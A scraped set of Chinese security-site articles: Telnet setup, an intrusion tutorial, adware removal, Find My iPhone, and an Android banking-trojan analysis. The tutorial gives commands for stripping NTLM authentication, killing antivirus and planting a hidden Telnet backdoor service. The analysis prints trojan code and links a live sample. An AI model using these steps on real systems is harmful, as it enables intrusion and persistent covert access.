0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">選中“Telnet客戶端“點擊 下一步</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722473772408.png" style="color: rgb(1, 150, 227); line-height: 22.75px;"><img alt="" width="698" height="511" original="http://pic.cr173.com/up/2015-5/2015051722473772408.png" src="https://pic.cr173.com/up/2015-5/2015051722473772408.png" style="border: 0px; max-width: 100%; height: auto; margin: 0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">確認安裝界面,點擊”安裝“</p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);"><a class="cboxElement" rel="nofollow" href="http://pic.cr173.com/up/2015-5/2015051722473846361.png" style="color: rgb(105, 105, 105); line-height: 22.75px; cursor: pointer;"><img alt="" width="695" height="511" original="http://pic.cr173.com/up/2015-5/2015051722473846361.png" src="https://pic.cr173.com/up/2015-5/2015051722473846361.png" style="border: 0px; max-width: 100%; height: auto; margin: 0px 0px 10px; padding: 0px; display: inline; background-color: transparent;"/></a></p><p style="line-height: 24px; margin-bottom: 10px; padding-top: 0px; color: rgb(76, 76, 76); white-space: normal; border: 0px; font-size: 13px; text-indent: 2em; font-family: &#39;Microsoft YaHei&#39;, 微軟雅黑, Arial, &#39;Lucida Grande&#39;, Tahoma, sans-serif; background-color: rgb(246, 246, 246);">telnet 安裝成功。</p><p><br/></p><p>windows 7 下面安裝telnet功能&nbsp;<a href="http://www.pirinnaturalssoapandspa.com/html/18697_1.html" _src="http://www.pirinnaturalssoapandspa.com/html/18697_1.html">http://www.pirinnaturalssoapandspa.com/html/18697_1.html</a>&nbsp;</p><p><br/></p><p>telnet 在服務器中最常用的就是用來測試某一臺服務器的端口是否打開</p><p>telnet IP 端口</p><p><strong>如: telnet </strong><a href="http://www.pirinnaturalssoapandspa.com" _src="http://www.pirinnaturalssoapandspa.com"><strong>www.pirinnaturalssoapandspa.com</strong></a><strong>&nbsp;80</strong></p><p><br/></p><p><strong>TELNET常用參數:</strong></p><p>命令可能是縮寫。支持的命令為:</p><p><br/></p><p>c &nbsp; &nbsp;- close &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;關閉當前連接</p><p>d &nbsp; &nbsp;- display &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;顯示操作參數</p><p>o &nbsp; &nbsp;- open hostname [port] &nbsp; &nbsp; 連接到主機(默認端口 23)。</p><p>q &nbsp; &nbsp;- quit &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 退出 telnet</p><p>set &nbsp;- set &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;設置選項(鍵入 &#39;set ?&#39; 獲得列</p><p>sen &nbsp;- send &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 將字符串發送到服務器</p><p>st &nbsp; - status &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 打印狀態信息</p><p>u &nbsp; &nbsp;- unset &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;解除設置選項(鍵入 &#39;set ?&#39; 獲</p><p>?/h &nbsp;- help &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 打印幫助信息</p><p><br/></p><p><br/></p><p><br/></p><h3><strong>1、什么是Telnet?</strong></h3><p>  對于Telnet的認識,不同的人持有不同的觀點,可以把Telnet當成一種通信協議,但是對于入侵者而言,Telnet只是一種遠程登錄的工具。一旦入侵者與遠程主機建立了Telnet連接,入侵者便可以使用目標主機上的軟、硬件資源,而入侵者的本地機只相當于一個只有鍵盤和顯示器的終端而已。</p><p><strong>2、Telnet被入侵者用來做什么</strong></p><p>  (1)Telnet是控制主機的第一手段</p><p>  如果入侵者想要在遠程主機上執行命令,需要建立IPC$連接,然后使用net time命令查看系統時間,最后使用at命令建立計劃任務才能完成遠程執行命令。雖然這種方法能夠遠程執行命令,但相比之下,Telnet方式對入侵者而言則會方便得多。入侵者一旦與遠程主機建立Telnet連接,就可以像控制本地計算機一樣來控制遠程計算機??梢?,Telnet方式是入侵者慣于使用的遠程控制方式,當他們千方百計得到遠程主機的管理員權限后,一般都會使用Telnet方式進行登錄。</p><p>  (2)用來做跳板</p><p>入侵者把用來隱身的肉雞稱之為“跳板”,他們經常用這種方法,從一個“肉雞”登錄到另一個“肉雞”,這樣在入侵過程中就不會暴露自己的IP地址。</p><p><strong>3.關于NTLM驗證</strong></p><p>由于Telnet功能太強大,而且也是入侵者使用最頻繁的登錄手段之一,因此微軟公司為Telnet添加了身份驗證,稱為NTLM驗證,它要求Telnet終端除了需要有Telnet服務主機的用戶名和密碼外,還需要滿足NTLM驗證關系。NTLM驗證大大增強了Telnet主機的安全性,就像一只攔路虎把很多入侵者拒之門外。</p><p><strong>4、Telnet語法</strong></p><p>telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]</p><p>-a 企圖自動登錄。除了用當前已登陸的用戶名以外,與 -l 選項相同。</p><p>-e 跳過字符來進入 telnet 客戶提示。</p><p>-f 客戶端登錄的文件名</p><p>-l 指定遠程系統上登錄用的用戶名稱。</p><p>要求遠程系統支持 TELNET ENVIRON 選項。</p><p>-t 指定終端類型。</p><p>支持的終端類型僅是: vt100, vt52, ansi 和 vtnt。</p><p>host 指定要連接的遠程計算機的主機名或 IP 地址。</p><p>port 指定端口號或服務名。</p><p>5.使用Telnet登錄</p><p>登錄命令:telnet HOST [PORT] 例如:telnet 61.152.158.132 23(默認端口)</p><p>斷開Telnet連接的命令:exit</p><p>  成功地建立Telnet連接,除了要求掌握遠程計算機上的賬號和密碼外,還需要遠程計算機已經開啟“Telnet服務”,并去除NTLM驗證。也可以使用專門的Telnet工具來進行連接,比如STERM,CTERM等工具。</p><p>6.Telnet典型入侵(如果以下內容不太了解,可以簡單了解)</p><p>  1.Telnet典型入侵步驟</p><p>  步驟一:建立IPC$連接。其中sysback是前面建立的后門賬號。</p><p>  步驟二:開啟遠程主機中被禁用的Telnet服務。</p><p>  步驟三:斷開IPC$連接。</p><p>  步驟四:去掉NTLM驗證。如果沒有去除遠程計算機上的NTLM驗證,在登錄遠程計算機的時候就會失敗。</p><p>  不過入侵者會使用各種方法使NTLM驗證形同虛設。解除NTLM的方法有很多,下面列出一些常用的方法,來看看入侵者如何去除NTLM驗證。</p><p>  (1)方法一&nbsp;</p><p>  首先,在本地計算機上建立一個與遠程主機上相同的賬號和密碼。</p><p>  然后,通過“開始”→“程序”→“附件”找到“命令提示符”,使用鼠標右鍵單擊“命令提示符”,然后選擇“屬性”</p><p>  在“以其他用戶身份運行(U)”前面“打鉤”,然后單擊“確定”按鈕。接著,仍然按照上述路徑找到“命令提示符”,用鼠標左鍵單擊打開,得到如圖所示對話框。</p><p>  如圖所示,鍵入“用戶名”和“密碼”。</p><p>  單擊“確定”按鈕后,得到MS-DOS界面,然后用該MS-DOS進行Telnet登錄。</p><p>  鍵入“telnet 192.168.27.128”命令并回車后,在得到的界面中鍵入“y”表示發送密碼并登錄,如圖所示。</p><p>  最后得到就是遠程主機為Telnet終端用戶打開的Shell,在該Shell中輸入的命令將會直接在遠程計算機上執行。</p><p>  比如,鍵入“net user”命令來查看遠程主機上的用戶列表。</p><p>  (2)方法二&nbsp;</p><p>  該方法使用工具NTLM.EXE來去除NTLM驗證。首先與遠程主機建立IPC$連接,然后將NTLM.EXE拷貝至遠程主機,最后通過at命令使遠程計算機執行NTLM.EXE。</p><p>  計劃任務執行NTLM.EXE后,便可鍵入“telnet 192.168.27.128”命令來登錄遠程計算機。</p><p>  最后得到登錄界面</p><p>  在該登錄界面中鍵入用戶名和密碼,如果用戶名和密碼正確,便會登錄到遠程計算 機,得到遠程計算機的Shell。</p><p>  成功登錄。</p><p>  另外,還可以使用與opentelnet.exe相配套的程序resumetelnet.exe來恢復遠程主機的NTLM驗證,命令格式為“ResumeTelnet.exe \\server sername password”。</p><p>  執行后回顯可知,resumetelnet.exe關閉了目標主機的Telnet服務,恢復了NTLM驗證。</p><p>  Telnet高級入侵全攻略&nbsp;</p><p>  從前面的介紹可以看出,即使計算機使用了NTLM驗證,入侵者還是能夠輕松地去除NTLM驗證來實現Telnet登錄。如果入侵者使用23號端口登錄,管理員便可以輕易地發現他們,但不幸的是,入侵者通常不會通過默認的23號端口進行Telnet連接。那么入侵者究竟如何修改Telnet端口,又如何修改Telnet服務來隱蔽行蹤呢?下面舉一些常見的例子來說明這一過程,并介紹一下完成這一過程所需要的工具。</p><p>  X-Scan:用來掃出存在NT弱口令的主機。</p><p>  opentelnet:用來去NTLM驗證、開啟Telnet服務、修改Telnet服務端口。</p><p>  AProMan:用來查看進程、殺死進程。</p><p>  instsrv:用來給主機安裝服務。</p><p>  (1)AProMan簡介</p><p>  AproMan以命令行方式查看進程、殺死進程,不會被殺毒軟件查殺。舉個例子,如果入侵者發現目標主機上運行有殺毒軟件,會導致上傳的工具被殺毒軟件查殺,那么他們就會要在上傳工具前關閉殺毒防火墻。使用方法如下:</p><p>  c:\AProMan.exe -a 顯示所有進程</p><p>  c:\AProMan.exe -p 顯示端口進程關聯關系(需Administrator權限)</p><p>  c:\AProMan.exe -t [PID] 殺掉指定進程號的進程</p><p>  c:\AProMan.exe -f [FileName] 把進程及模塊信息存入文件</p><p>  (2)instsrv簡介</p><p>  instsrv是一款用命令行就可以安裝、卸載服務的程序,可以自由指定服務名稱和服務所執行的程序。instsrv的用法如下:</p><p>  安裝服務:instsrv &lt;服務名稱&gt; &lt;執行程序的位置&gt;</p><p>  卸載服務:instsrv &lt;服務名稱&gt; REMOVE</p><p>  還有另一款優秀的遠程服務管理工具SC。它屬于命令行工具,可以在本地對遠程計算機上的服務進行查詢、啟動、停止和刪除。它的用法很簡單,這里不作介紹了。下面通過實例來介紹入侵者如何實現Telnet登錄并留下Telnet后門的過程。</p><p>  步驟一:掃出有NT弱口令的主機。在X-Scan的“掃描模塊”中選中“NT-SERVER弱口令”。</p><p>  然后在“掃描參數中”指定掃描范圍為“192.168.27.2到192.168.27.253”。</p><p>  等待一段時間后,得到掃描結果。</p><p>  步驟二:用opentelnet打開遠程主機Telnet服務、修改目標主機端口、去除NTLM驗證。&nbsp;</p><p><br/></p><p>  無論遠程主機是否開啟“Telnet服務”,入侵者都可以通過工具opentelnet來解決。比如,通過“opentelnet \\192.168.27.129 administrator &quot;&quot; 1 66”命令為IP地址為192.168. 27.129的主機去除NTLM認證,開啟Telnet服務,同時又把Telnet默認的23號登錄端口改成66號端口。</p><p>  步驟三:把所需文件(instsrv.exe、AProMan.exe)拷貝到遠程主機。</p><p>  首先建立IPC$,然后通過映射網絡硬盤的方法把所需文件拷貝、粘貼到遠程計算機的c:\winnt文件夾中。</p><p>  拷貝成功后。</p><p>  步驟四:Telnet登錄。</p><p>  在MS-DOS中鍵入命令“telnet 192.168.27.129 66”來登錄遠程主機192.168.27.129。</p><p>  步驟五:殺死防火墻進程。</p><p>  如果入侵者需要把類似木馬的程序拷貝到遠程主機并執行,那么他們會事先關閉遠程主機中的殺毒防火墻。雖然這里沒有拷貝類似木馬的程序到遠程主機,但還是要介紹一下這一過程。當入侵者登錄成功后,他們會進入到c:\winnt目錄中使用AProMan程序。首先通過命令 AProMan –A查看所有進程,然后找到殺毒防火墻進程的PID,最后使用AProMan –t [PID]來殺掉殺毒防火墻。</p><p>  步驟六:另外安裝更為隱蔽的Telnet服務。</p><p>  為了事后仍然能登錄到該計算機,入侵者在第一次登錄之后都會留下后門。這里來介紹一下入侵者如何通過安裝系統服務的方法來讓Telnet服務永遠運行。在安裝服務之前,有必要了解一下Windows操作系統是如何提供“Telnet服務”的。打開“計算機管理”,然后查看“Telnet服務”屬性。</p><p>  在“Telnet 的屬性”窗口中,可以看到其中“可執行文件的路徑”指向“C:\WINNT\ SYSTEM32\tlntsvr.exe”??梢?,程序tlntsvr.exe就是Windows系統中專門用來提供“Telnet服務”的。也就是說,如果某服務指向該程序,那么該服務就會提供Telnet服務。因此,入侵者可以自定義一個新服務,將該服務指向tlntsvr.exe,從而通過該服務提供的Telnet服務登錄,這樣做后,即使遠程主機上的Telnet服務是被禁用的,入侵者也可以毫無阻礙的登錄到遠程計算機,這種方法被稱之為 Telnet后門。下面就介紹一下上述過程是如何實現的。首先進入instsrv所在目錄。</p><p>  然后使用instsrv.exe建立一個名為“SYSHEALTH”的服務,并把這個服務指向C:\WINNT z\SYSTEM32\tlntsvr.exe,根據instsrv.exe的用法,鍵入命令“instsrv.exe SYSHEALTH C:\WINNT\SYSTEM32\tlntsvr.exe”。</p><p>  一個名為“SYSHEAHTH”的服務就這樣建立成功了。雖然從表面看上去該服務與遠程連接不存在任何關系,但是實際上該服務是入侵者留下的Telnet后門服務。</p><p>  通過“計算機管理”可以看到該服務已經添加在遠程計算機上。入侵者一般會把這個服務的啟動類型設置成“自動”,把原來的“Telnet服務”停止并禁用。</p><p>  通過驗證可知,雖然遠程主機上的Telnet服務已經被停止并禁用,但入侵者仍然能夠 &nbsp; &nbsp; &nbsp;通過Telnet來控制遠程主機。通過這些修改,即使管理員使用“netstat –n”命令來查看開放端口號也看不出66端口正在提供Telnet服務,此命令平常還可以拿來判斷端口的連接情況。</p><p><br/></p><p><br/></p> [系統安全]BaiduProtect.exe進程無法刪除 http://www.pirinnaturalssoapandspa.com//html/48684_1.html 西西 系統安全 2014/12/24 22:41:24 <p>最近這幾天不知是安裝了一個什么程序,打開任何瀏覽器無論如何設置打開的第一個頁面總是 <a href="http://www.baidu.com/" _src="http://www.baidu.com/">http://www.baidu.com/</a>&nbsp;就算把ie的主頁改成任何網址都無效,用萬能的360任何修復首頁或鎖定首頁都無效,馬上把所有不知名的軟件全部給刪了,包括百度衛士、百度殺毒等全刪了也是無效。</p><p>沒辦法只好到注冊表中搜 <a href="http://www.baidu.com" _src="http://www.baidu.com">www.baidu.com</a>&nbsp;然后再一個一個改來確定看值是不是存在注冊表中。</p><p><br/></p><p>結果查到</p><p>HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Baidu\BaiduProtect\LockIEStartPage 下面的&nbsp;Start Page 的值改一下后就可以修改過來</p><p><img src="https://pic.cr173.com/up/2014-12/14194317429326506.jpg" title="abc.jpg"/></p><p><br/></p><p>推薦大家用RegWorkshop來查注冊表非常方便,比系統自帶的regedit 要方便多了,支持64、32位系統,下載地址:<a href="http://www.pirinnaturalssoapandspa.com/soft/3321.html" _src="https://pic.cr173.com/soft/3321.html">http://www.pirinnaturalssoapandspa.com/soft/3321.html</a> </p><p><br/></p><p>通過這個注冊表項基本上就猜測出來了<span style="line-height: 12px;">BaiduProtect的一個安全產品,然后在任務管理器就找到了進程 &nbsp;<span style="line-height: 12px;">BaiduProtect.exe 然后定位到程序目錄下</span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;">C:\Program Files (x86)\Common Files\Baidu\BaiduProtect1.3\1.3.0.323</span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;">目錄下有&nbsp;uninst.exe 雙擊就可以把這個服務給刪掉了</span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;"><br/></span></span></p><p><span style="line-height: 12px;"><span style="line-height: 12px;"><br/></span></span></p> [安全產品]蘋果手機丟了怎么定位?使用”查找我的iphone“幫您找回手機 http://www.pirinnaturalssoapandspa.com//html/34024_1.html 西西 安全產品 2014/6/23 11:07:38 <p>今天教大家一個特別簡單的找丟失了的iphone的辦法,只需要一部手機或者是一臺電腦就可以??梢岳镁W頁登錄iCloud來使用“查找我的iphone”,通過控制iphone使用來達到保護資料、隱私、甚至找回iphone!</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-6/201406231053013264524.png"/></p><p><strong>利用iphone來操作查找iphone</strong></p><p>1.利用iphone手機來操作查找iphone在iphone上打開App Store先下載軟件“查找我的iphone”并安裝。下載完成后在iphone的桌面上打開“查找iphone”的圖標;&nbsp;</p><p>2.打開后會顯示登錄界面,在登錄界面輸入你的Apple ID、密碼后進行登錄“查找我的iphone”軟件(注意:如果iCloud帳戶尚未關聯Apple ID將無法進行登錄,所以要先到設置選項中的“iCloud”激活iCloud帳戶再進行操作);</p><p><strong>利用網頁登錄iCloud來操作查找iphone</strong></p><p>以上的“查找我的iphone”軟件登錄后就可以了,現在我來說一下如何使用iCloud來操作查找我的iphone的方法。</p><p>1.首先用電腦打開iCloud官網并用Apple ID登錄iCloud帳戶;</p><p>2.登錄成功后可以看到iCloud界面中左下角有個“查找我的iphone”的圖標,點擊打開該圖標并再次輸入Apple ID密碼以使用“查找我的iphone”功能</p><p>3.然后在登錄成功后在界面頂部選擇好你的iphone設備,如果你iphone的定位沒有打開的則看不到iphone在哪里,只有在定位打開了就能看到你的iphone在哪里。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2014-6/201406231053208524641.png"/></p><p><span style="color: rgb(255, 0, 0);"><strong>iphone未打開定位服務的操作方法</strong></span></p><p>1.iphone不可能無時無該都保證打開定位服務,我的也是一樣為了省電、保護隱私等等經常性關閉GPS定位?,F在說說iphone未打開定位服務操作“查找我的iphone”的方法,其實打開了定位服務操作也是一樣,只不過是多了地圖顯示位置的區別的而已 如未打開定位服務則使用“查找我的iphone”中的功能來找回或保護隱私、資料等。</p><p>2.“播放鈴聲”功能:通過播放鈴聲來提醒該iphone屬于失物,使用該功能后會在丟失的iphone中顯示提醒;點擊“播放鈴聲或者發送信息”,就可以給設備發送消息,可告知別人你的聯系方式,遇到好心人也許就能尋回iPhone。這個方法也試用于知道iPhone的位置但卻找不到,或許聽到鈴聲就找到啦。</p><p>3. “丟失模式”功能:通過設置丟失模式可以在丟失的iphone上顯示你所想對拾獲者說的話。 第一步:先設置你現在的手機號碼(非已丟失iphone中的手機號碼),這個手機號碼的用處主要是用來顯示在丟失的iphone上的,讓拾獲者看到后可以主動聯系你歸還。當然啦,這個得拾獲者良心發現! 第二步:輸入你所說的話,可以是一些警告性話語等等。設置完成這一步驟后點擊右上角的完成即可,iphone會進入丟失模式并使用現有密碼進行鎖定你的iphone;</p><p>4.抹掉iphone”功能:就算前面兩招都沒有用的話,那么最后一招則可以防止你的隱私被涉漏。選擇抹掉iphone功能后,你iphone上的所有東西都會被刪除,這樣就不用擔心隱私涉漏了。適用于找不回iphone的情況下,可以將隱私性質的信息銷毀,將損失降到最低。</p> [病毒漏洞]android病毒“銀行悍匪”獨家分析 http://www.pirinnaturalssoapandspa.com//html/28594_1.html 西西小熊 病毒漏洞 2014/3/24 9:14:21 <p><strong>一、&nbsp;&nbsp;</strong><strong>病毒樣本基本信息</strong></p><p>FileName: b5910a432d2b866e1028f31874edb32f .apk<br/>File MD5: b5910a432d2b866e1028f31874edb32f</p><p>SHA1:0CEEB0A29AC4B24E1EFDD0F57ACFC64388CF5AC1</p><p>File Size: 829006 Byte</p><p>Package:langthing.nend &nbsp;&nbsp;</p><p><strong>Download:http://yunpan.cn/Q4qHuRLaNivtd&nbsp; &nbsp; 訪問密碼 3a90&nbsp; &nbsp;&nbsp;&nbsp;解壓密碼:52pojie</strong><br/><br/>// 該病毒首先偽裝成系統程序防止卸載;然后試著去卸載安全軟件;監測各種銀行應用;對需要攔截短信的關鍵字進行了加密,增加了分析的難度;沒有MAIN和LAUNCHER組件,安裝后沒有圖標,防止用戶察覺到安裝了應用</p><p><strong>二、&nbsp;&nbsp;</strong><strong>病毒代碼分析</strong></p><p>查看AndroidManifest.xml配置文件,可以發現賦予了病毒非常多的權限,且是高危的權限,例如發送短信、撥打電話、讀取日志文件、重啟應用程序等等,且沒有MAIN和LAUNCHER組件</p><p>&lt;manifest android:versionCode=&quot;1&quot; android:versionName=&quot;1.1&quot; package=&quot;langthing.nend&quot;</p><p>&nbsp; xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot;&gt;</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.RECEIVE_SMS&quot; /&gt; &nbsp;//接收短信</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.SEND_SMS&quot; /&gt; &nbsp; &nbsp; &nbsp;//發送短信</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_SMS&quot; /&gt; &nbsp; &nbsp; //讀取短息</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.WRITE_SMS&quot; /&gt; &nbsp;//編輯短信</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.SEND_SMS&quot; /&gt;</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_CONTACTS&quot; /&gt; &nbsp; &nbsp;//讀取通訊錄</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.WRITE_SETTINGS&quot; /&gt; &nbsp; //讀取系統設置的數據庫權限</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_LOGS&quot; /&gt; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; //讀取日志文件</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.WRITE_CONTACTS&quot; /&gt;//編輯通訊錄聯系人</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.READ_PHONE_STATE&quot; /&gt;//讀取電話狀態</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.CALL_PHONE&quot; /&gt; &nbsp; &nbsp; &nbsp; &nbsp; //撥打電話</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.RECEIVE_BOOT_COMPLETED&quot; /&gt;//接收開機信息</p><p>&nbsp; &nbsp; &lt;uses-permission android:name=&quot;android.permission.GET_TASKS&quot; /&gt; &nbsp;//獲取運行程序信息</p><p>&lt;uses-permission android:name=&quot;android.permission.RESTART_PACKAGES&quot; /&gt;//重啟應用程序</p><p>查看AndroidManifest.xml配置文件,可以發現當手機接收到TReceiver、eviceAdminReceiver、Alarmreceiver等組件時就會啟動程序</p><p>receiver android:name=&quot;.TReceiver&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter android:priority=&quot;2147483647&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;android.intent.action.BOOT_COMPLETED&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;/receiver&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;receiver android:label=&quot;@string/app_name&quot; android:name=&quot;.deviceAdminReceiver&quot; android:permission=&quot;android.permission.BIND_DEVICE_ADMIN&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;meta-data android:name=&quot;android.app.device_admin&quot; android:resource=&quot;@xml/device_admin&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;android.app.action.DEVICE_ADMIN_ENABLED&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;/receiver&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;receiver android:name=&quot;.Alarmreceiver&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;arui.alarm.action&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;/receiver&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &lt;receiver android:name=&quot;.ShutdownReceiver&quot;&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;intent-filter&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;action android:name=&quot;android.intent.action.ACTION_SHUTDOWN&quot; /&gt;</p><p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &lt;/intent-filter&gt;</p><p><span style="color: rgb(255, 0, 0); ">惡意注入代碼的代碼樹如下:</span></p><p><img src="https://pic.cr173.com/up/201403/091544_2840314567089.png"/>&nbsp;<br/><br/>當程序安裝后,會偽裝成系統程序,防止卸載。如圖:<br/><br/><img src="https://pic.cr173.com/up/201403/091544_3336720108985.png"/>&nbsp;<br/></p><p><span style="color: rgb(255, 0, 0); ">查看langthing.nend.main偽裝成系統代碼如下:</span></p><p>private void b()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; Intent localIntent = new Intent(&quot;android.app.action.ADD_DEVICE_ADMIN&quot;);</p><p>&nbsp; &nbsp; localIntent.putExtra(&quot;android.app.extra.DEVICE_ADMIN&quot;, this.c);</p><p>&nbsp; &nbsp; localIntent.putExtra(&quot;android.app.extra.ADD_EXPLANATION&quot;, &quot;------ android ------&quot;); &nbsp;// &nbsp;偽裝成系統應用</p><p>&nbsp; &nbsp; startActivityForResult(localIntent, 1);</p><p>&nbsp; }</p><p>當應用監測到銀行客戶端啟動時,就會終止個銀行進程,并為工商銀行、淘寶等定制了高仿真“釣魚界面”<br/></p><p>private void e()</p><p>&nbsp; {</p><p>&nbsp; &nbsp; ComponentName localComponentName = ((ActivityManager.RunningTaskInfo)p.getRunningTasks(1).get(0)).topActivity;</p><p>&nbsp; &nbsp; ActivityManager localActivityManager = (ActivityManager)getSystemService(&quot;activity&quot;);</p><p>&nbsp; &nbsp; String str = localComponentName.getClassName();</p><p>&nbsp; &nbsp; if ((str.contains(&quot;gs.gs&quot;)) || (str.contains(&quot;js.js&quot;)) || (str.contains(&quot;jt.jt&quot;)) || (str.contains(&quot;tb.tb&quot;)) || (str.contains(&quot;dz.dz&quot;)))</p><p>&nbsp; &nbsp; {</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.icbc&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.icbc&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.chinamworld.main&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.chinamworld.main&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.bankcomm&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.bankcomm&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.taobao.taobao&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.taobao.taobao&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.android.bankabc&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.android.bankabc&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;cmb.pb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;cmb.pb&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.bankgdb&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.rytong.bankgdb&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.cib.bankcib&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; localActivityManager.restartPackage(&quot;com.cib.bankcib&quot;);</p><p>&nbsp; &nbsp; &nbsp; if (a(getApplicationContext(), &quot;com.rytong.bankps&quot;))</p><p>&nbsp; &nbsp; &nbsp; &nbsp; 